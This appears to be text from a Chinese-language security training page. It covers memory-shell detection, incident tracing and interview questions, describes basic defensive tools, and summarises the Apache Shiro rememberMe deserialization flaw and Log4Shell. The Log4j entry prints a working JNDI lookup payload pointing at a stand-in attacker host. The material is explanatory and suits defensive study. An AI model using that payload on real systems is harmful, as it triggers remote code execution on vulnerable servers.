本系统包含内存马检测、溯源流程演示,并提供护网面试常见问题解答
基于规则控制流量进出,阻止未授权访问
监控网络流量,检测并阻止恶意活动
保护Web应用免受SQL注入、XSS等攻击
收集分析日志数据,检测安全威胁
Shiro框架使用AES加密的rememberMe Cookie,但使用了硬编码密钥,攻击者可以构造恶意序列化对象实现远程代码执行。
影响版本:Apache Shiro < 1.2.5
利用条件:目标使用rememberMe功能且密钥泄露
Log4j2的JNDI功能未对输入做验证,攻击者通过构造恶意LDAP请求实现远程代码执行。
影响版本:Log4j2 2.0-beta9 - 2.14.1
攻击向量:${jndi:ldap://attacker.com/exp}